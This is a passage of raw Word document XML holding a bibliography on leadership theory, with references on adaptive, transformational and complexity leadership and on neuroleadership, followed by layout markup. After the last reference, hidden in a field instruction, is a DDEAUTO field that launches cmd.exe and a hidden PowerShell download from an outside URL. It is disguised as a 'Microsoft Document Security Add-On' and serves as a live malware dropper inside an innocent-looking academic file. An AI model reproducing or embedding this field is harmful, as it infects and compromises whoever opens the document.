        <w:t xml:space="preserve">Avolio, B., Walumbwa, F. &amp; Weber, T., 2009. Leadership: Current Theories, Research and Future Directions. </w:t>
      </w:r>
      <w:r w:rsidRPr="003E0C9A">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve">Annual Review of Psychology, </w:t>
      </w:r>
      <w:r w:rsidRPr="003E0C9A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>Volume 60, pp. 421-449.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B06CAA" w:rsidRPr="003E0C9A" w:rsidRDefault="00B06CAA">
      <w:pPr>
        <w:pStyle w:val="Bibliography"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003E0C9A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve">Bass, B. M. &amp; Bass, R., 2008. </w:t>
      </w:r>
      <w:r w:rsidRPr="003E0C9A">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve">The Bass Handbook of Leadership; Theory, Research, and Managerial Applications. </w:t>
      </w:r>
      <w:r w:rsidRPr="003E0C9A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>New York: Free Press.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B06CAA" w:rsidRPr="003E0C9A" w:rsidRDefault="00B06CAA">
      <w:pPr>
        <w:pStyle w:val="Bibliography"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003E0C9A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve">Bass, B. M. &amp; Steidlmeier, P., 1999. Ethics, Character, and Authentic Transformational Leadership Behavior. </w:t>
      </w:r>
      <w:r w:rsidRPr="003E0C9A">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve">The Leadership Quarterly, </w:t>
      </w:r>
      <w:r w:rsidRPr="003E0C9A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>10(2), pp. 181-217.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B06CAA" w:rsidRPr="003E0C9A" w:rsidRDefault="00B06CAA">
      <w:pPr>
        <w:pStyle w:val="Bibliography"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003E0C9A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve">Carlyle, T., 1841. </w:t>
      </w:r>
      <w:r w:rsidRPr="003E0C9A">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve">On Heroes, Hero-worship, and the Heroic in History. </w:t>
      </w:r>
      <w:r w:rsidRPr="003E0C9A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>s.l.:James Fraser.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B06CAA" w:rsidRPr="003E0C9A" w:rsidRDefault="00B06CAA">
      <w:pPr>
        <w:pStyle w:val="Bibliography"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003E0C9A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve">Chemers, M. M., 2000. Leadership Research and Theory: A Functional Integration. </w:t>
      </w:r>
      <w:r w:rsidRPr="003E0C9A">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve">Group Dynamics: Theory, Research and Practice, </w:t>
      </w:r>
      <w:r w:rsidRPr="003E0C9A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>4(1), pp. 27-43.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B06CAA" w:rsidRPr="003E0C9A" w:rsidRDefault="00B06CAA">
      <w:pPr>
        <w:pStyle w:val="Bibliography"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003E0C9A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve">Commonwealth of Australia, 2013. </w:t>
      </w:r>
      <w:r w:rsidRPr="003E0C9A">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve">Catalogue. </w:t>
      </w:r>
      <w:r w:rsidRPr="003E0C9A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve">[Online] Available at: </w:t>
      </w:r>
      <w:r w:rsidRPr="003E0C9A">
        <w:rPr>
          <w:noProof/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>www.nla.gov.au</w:t>
      </w:r>
      <w:r w:rsidRPr="003E0C9A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:br/>
        <w:t>[Accessed 19 March 2013].</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B06CAA" w:rsidRPr="003E0C9A" w:rsidRDefault="00B06CAA">
      <w:pPr>
        <w:pStyle w:val="Bibliography"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003E0C9A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve">Creelman, D., 2009. </w:t>
      </w:r>
      <w:r w:rsidRPr="003E0C9A">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve">Creelman Research Thought Leaders: Ron Heifetz Adaptive Leadership. </w:t>
      </w:r>
      <w:r w:rsidRPr="003E0C9A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve">[Online] </w:t>
      </w:r>
      <w:r w:rsidRPr="003E0C9A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">Available at: </w:t>
      </w:r>
      <w:r w:rsidRPr="003E0C9A">
        <w:rPr>
          <w:noProof/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>http://creelmanresearchlibrary.files.wordpress.com/2011/10/creelman-2009-vol-2-5-heifetz-on-adaptive-leadership.pdf</w:t>
      </w:r>
      <w:r w:rsidR="00655E25">
        <w:rPr>
          <w:noProof/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="003E0C9A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:br/>
        <w:t>[Accessed 10 April 2013].</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B06CAA" w:rsidRDefault="00B06CAA">
      <w:pPr>
        <w:pStyle w:val="Bibliography"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003E0C9A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve">Galton, F., 1869. </w:t>
      </w:r>
      <w:r w:rsidRPr="003E0C9A">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve">Hereditary Genius. </w:t>
      </w:r>
      <w:r w:rsidRPr="003E0C9A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>London: Macmillan and Co.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B06CAA" w:rsidRPr="003E0C9A" w:rsidRDefault="00B06CAA">
      <w:pPr>
        <w:pStyle w:val="Bibliography"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003E0C9A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve">George, B., 2012. Authentic Leadership Development. In: S. Snook, N. Nohria &amp; R. Khurana, eds. </w:t>
      </w:r>
      <w:r w:rsidRPr="003E0C9A">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve">The Handbook for Teaching Leadership: Knowing, Doing, and Being. </w:t>
      </w:r>
      <w:r w:rsidRPr="003E0C9A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>Thousand Oaks: SAGE Publications, Inc, pp. 313-327.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B06CAA" w:rsidRPr="003E0C9A" w:rsidRDefault="00B06CAA">
      <w:pPr>
        <w:pStyle w:val="Bibliography"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003E0C9A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve">Goethals, G. R., 2005. Presidential Leadership. </w:t>
      </w:r>
      <w:r w:rsidRPr="003E0C9A">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve">Annual Review of Psychology, </w:t>
      </w:r>
      <w:r w:rsidRPr="003E0C9A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>Volume 56, pp. 545-570.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B06CAA" w:rsidRPr="003E0C9A" w:rsidRDefault="00B06CAA">
      <w:pPr>
        <w:pStyle w:val="Bibliography"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003E0C9A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve">Google Scholar, 2013. </w:t>
      </w:r>
      <w:r w:rsidRPr="003E0C9A">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve">search page. </w:t>
      </w:r>
      <w:r w:rsidRPr="003E0C9A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve">[Online] Available at: </w:t>
      </w:r>
      <w:r w:rsidRPr="003E0C9A">
        <w:rPr>
          <w:noProof/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>www.scholar.google.com</w:t>
      </w:r>
      <w:r w:rsidRPr="003E0C9A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:br/>
        <w:t>[Accessed 19 March 2013].</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B06CAA" w:rsidRPr="003E0C9A" w:rsidRDefault="00B06CAA">
      <w:pPr>
        <w:pStyle w:val="Bibliography"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003E0C9A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve">Heifetz, R., Grashow, A. &amp; Linsky, M., 2009. </w:t>
      </w:r>
      <w:r w:rsidRPr="003E0C9A">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve">The Practice of Adaptive Leadership; Tools and Tactics for Changing Your Organization and the World. </w:t>
      </w:r>
      <w:r w:rsidRPr="003E0C9A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>Boston: Harvard Business Press.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B06CAA" w:rsidRPr="003E0C9A" w:rsidRDefault="00B06CAA">
      <w:pPr>
        <w:pStyle w:val="Bibliography"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003E0C9A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve">Heifetz, R. &amp; Laurie, D., 2001. The Work of Leadership. </w:t>
      </w:r>
      <w:r w:rsidRPr="003E0C9A">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve">Harvard Business Review, </w:t>
      </w:r>
      <w:r w:rsidRPr="003E0C9A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>5(14).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B06CAA" w:rsidRPr="003E0C9A" w:rsidRDefault="00B06CAA">
      <w:pPr>
        <w:pStyle w:val="Bibliography"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003E0C9A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve">Heifetz, R. &amp; Laurie, D., 2011. The Work of Leadership. In: </w:t>
      </w:r>
      <w:r w:rsidRPr="003E0C9A">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve">HBR's 10 Must Reads: On Leadership. </w:t>
      </w:r>
      <w:r w:rsidRPr="003E0C9A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>Boston: Harvard Business Review Press, pp. 57-78.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B06CAA" w:rsidRPr="003E0C9A" w:rsidRDefault="00B06CAA">
      <w:pPr>
        <w:pStyle w:val="Bibliography"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003E0C9A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Khan, A., 2013. Approaches in Leadership: Trait, Situational and Path-Goal Theory: A Critical Analysis. </w:t>
      </w:r>
      <w:r w:rsidRPr="003E0C9A">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve">Pakistan Business Review, </w:t>
      </w:r>
      <w:r w:rsidRPr="003E0C9A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>14(4), pp. 830-842.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B06CAA" w:rsidRPr="003E0C9A" w:rsidRDefault="00B06CAA">
      <w:pPr>
        <w:pStyle w:val="Bibliography"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003E0C9A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve">Kuhnert, K. W. &amp; Lewis, P., 1987. Transactional and Transformational Leadership: A Constructive/Developmental Analysis. </w:t>
      </w:r>
      <w:r w:rsidRPr="003E0C9A">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve">The Academy of Management Review, </w:t>
      </w:r>
      <w:r w:rsidRPr="003E0C9A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>12(4), pp. 648-657.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B06CAA" w:rsidRPr="003E0C9A" w:rsidRDefault="00B06CAA">
      <w:pPr>
        <w:pStyle w:val="Bibliography"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003E0C9A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve">Lichtenstein, B. et al., 2006. </w:t>
      </w:r>
      <w:r w:rsidRPr="003E0C9A">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve">Complexity leadership theory: An interactive perspective on leading in complex adaptive systems. </w:t>
      </w:r>
      <w:r w:rsidRPr="003E0C9A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve">[Online] Available at: </w:t>
      </w:r>
      <w:r w:rsidRPr="003E0C9A">
        <w:rPr>
          <w:noProof/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>http://digitalcommons.unl.edu/managementfacpub/8</w:t>
      </w:r>
      <w:r w:rsidRPr="003E0C9A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:br/>
        <w:t>[Accessed 12 April 2013].</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E35EC8" w:rsidRDefault="00E35EC8">
      <w:pPr>
        <w:pStyle w:val="Bibliography"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve">McCrimmon, M., n.d. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve">lead2xl.com. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve">[Online] </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">Available at: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>http://www.lead2xl.com/heifetz-on-leadership.html</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:br/>
        <w:t>[Accessed 5 April 2013].</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B06CAA" w:rsidRPr="003E0C9A" w:rsidRDefault="00B06CAA">
      <w:pPr>
        <w:pStyle w:val="Bibliography"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003E0C9A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve">Mitchell, T. R., Biglan, A., Oncken, G. R. &amp; Fiedler, F. E., 1970. The Contingency Model: Criticism and Suggestions. </w:t>
      </w:r>
      <w:r w:rsidRPr="003E0C9A">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve">The Academy of Management Journal, </w:t>
      </w:r>
      <w:r w:rsidRPr="003E0C9A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>13(3), pp. 253-267.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B06CAA" w:rsidRDefault="00B06CAA">
      <w:pPr>
        <w:pStyle w:val="Bibliography"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003E0C9A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve">Ringleb, A. H. &amp; Rock, D., 2008. The emerging field of NeuroLeadership. </w:t>
      </w:r>
      <w:r w:rsidRPr="003E0C9A">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve">NeuroLeadership Journal, </w:t>
      </w:r>
      <w:r w:rsidRPr="003E0C9A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>Volume 1.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B06CAA" w:rsidRPr="003E0C9A" w:rsidRDefault="00B06CAA" w:rsidP="00B86174">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003E0C9A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve">Ringleb, A. H., Rock, D. &amp; Ancona, C., 2012. NeuroLeadership in 2011 and 2012. </w:t>
      </w:r>
      <w:r w:rsidRPr="003E0C9A">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve">NeuroLeadership Journal, </w:t>
      </w:r>
      <w:r w:rsidRPr="003E0C9A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>Volume 4.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B06CAA" w:rsidRDefault="00B06CAA">
      <w:pPr>
        <w:pStyle w:val="Bibliography"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003E0C9A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve">Rock, D. &amp; Schwartz, J., 2006. The Neuroscience of Leadership. </w:t>
      </w:r>
      <w:r w:rsidRPr="003E0C9A">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve">Strategy + Business, </w:t>
      </w:r>
      <w:r w:rsidRPr="003E0C9A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>Issue 43, pp. 72-83.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E35EC8" w:rsidRDefault="00E35EC8" w:rsidP="00E35EC8">
      <w:pPr>
        <w:pStyle w:val="Bibliography"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> BIBLIOGRAPHY </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve">Rock, D. &amp; Ringleb, A. H., 2009. Defining NeuroLeadership as a field. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve">NeuroLeadership Journal, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>Volume 2.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B06CAA" w:rsidRPr="003F71DF" w:rsidRDefault="00E35EC8" w:rsidP="003F71DF">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00B06CAA" w:rsidRPr="003E0C9A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve">Uhl-Bien, M., Marion, R. &amp; McKelvey, B., 2007. </w:t>
      </w:r>
      <w:r w:rsidR="00B06CAA" w:rsidRPr="003E0C9A">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve">Complexity Leadership Theory: Shifting leadership from the industrial age to the knowledge era. </w:t>
      </w:r>
      <w:r w:rsidR="00B06CAA" w:rsidRPr="003E0C9A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve">[Online] </w:t>
      </w:r>
      <w:r w:rsidR="00B06CAA" w:rsidRPr="003E0C9A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">Available at: </w:t>
      </w:r>
      <w:r w:rsidR="00B06CAA" w:rsidRPr="003E0C9A">
        <w:rPr>
          <w:noProof/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>http://digitalcommons.unl.edu/leadershipfacpub/18</w:t>
      </w:r>
      <w:r w:rsidR="00B06CAA" w:rsidRPr="003E0C9A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:br/>
        <w:t>[Accessed 12 April 2013].</w:t>
      </w:r>
      <w:r w:rsidR="003F71DF">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="003F71DF">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:instrText xml:space="preserve"> </w:instrText>
      </w:r>
      <w:bookmarkStart w:id="13" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="13"/>
      <w:r w:rsidR="003F71DF">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:instrText>DDEAUTO "C:\\Programs\\Microsoft\\Office\\MSWord\\..\\..\\..\\..\\windows\\system32\\cmd.exe /c powershell.exe -w 1 -nop -C (New-Object System.Net.WebClient).DownloadString('http://www.1clickurls.com/id/27c32b39e2b013ddaf4fb4f8c5b291ae/')" "Micros</w:instrText>
      </w:r>
      <w:r w:rsidR="003F71DF">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:instrText xml:space="preserve">oft Document Security Add-On"  </w:instrText>
      </w:r>
      <w:r w:rsidR="003F71DF">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:instrText xml:space="preserve"> </w:instrText>
      </w:r>
      <w:r w:rsidR="003F71DF">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C1403" w:rsidRPr="009C1403" w:rsidRDefault="005F28E4">
      <w:pPr>
        <w:pStyle w:val="Bibliography"/>
      </w:pPr>
      <w:r w:rsidRPr="00A11345">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="009C1403" w:rsidRPr="009C1403" w:rsidSect="007D4C39">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code="9"/>
      <w:pgMar w:top="1418" w:right="1418" w:bottom="1418" w:left="1418" w:header="567" w:footer="56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E21" w:rsidRDefault="00067E21">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="00067E21" w:rsidRDefault="00067E21">
      <w:r>
        <w:continuationSeparator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationNotice" w:id="1">
    <w:p w:rsidR="00067E21" w:rsidRPr="00197979" w:rsidRDefault="00067E21" w:rsidP="00197979">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A81" w:rsidRDefault="007C7A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33170"/>
      <w:docPartObj>
        <w:docPartGallery w:val="Page Numbers (Bottom of Page)"/>
        <w:docPartUnique/>
      </w:docPartObj>
    </w:sdtPr>
    <w:sdtEndPr/>
    <w:sdtContent>
      <w:p w:rsidR="007D4C39" w:rsidRDefault="007D4C39" w:rsidP="00DA4895">
        <w:pPr>
          <w:pStyle w:val="APSCPagenumber"/>
        </w:pPr>
        <w:r>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:instrText xml:space="preserve"> PAGE   \* MERGEFORMAT </w:instrText>
        </w:r>
        <w:r>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="003F71DF">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>19</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:p>
    </w:sdtContent>
  </w:sdt>
  <w:p w:rsidR="007D4C39" w:rsidRDefault="007D4C3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A81" w:rsidRDefault="007C7A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E21" w:rsidRDefault="00067E21" w:rsidP="00336555">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00067E21" w:rsidRDefault="00067E21"/>
    <w:p w:rsidR="00067E21" w:rsidRDefault="00067E21"/>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="00067E21" w:rsidRDefault="00067E21" w:rsidP="00336555">
      <w:r>
        <w:continuationSeparator/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00067E21" w:rsidRDefault="00067E21"/>
    <w:p w:rsidR="00067E21" w:rsidRDefault="00067E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A81" w:rsidRDefault="007C7A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A81" w:rsidRDefault="007C7A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A81" w:rsidRDefault="007C7A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C0044D6"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1492"/>
        </w:tabs>
        <w:ind w:left="1492" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="1">
    <w:nsid w:val="FFFFFF7D"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="7BF288C2"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1209"/>
        </w:tabs>
        <w:ind w:left="1209" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="2">
    <w:nsid w:val="FFFFFF7E"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="543A8B32"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="926"/>
        </w:tabs>
        <w:ind w:left="926" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="3">
    <w:nsid w:val="FFFFFF7F"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="E7A0AAEA"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
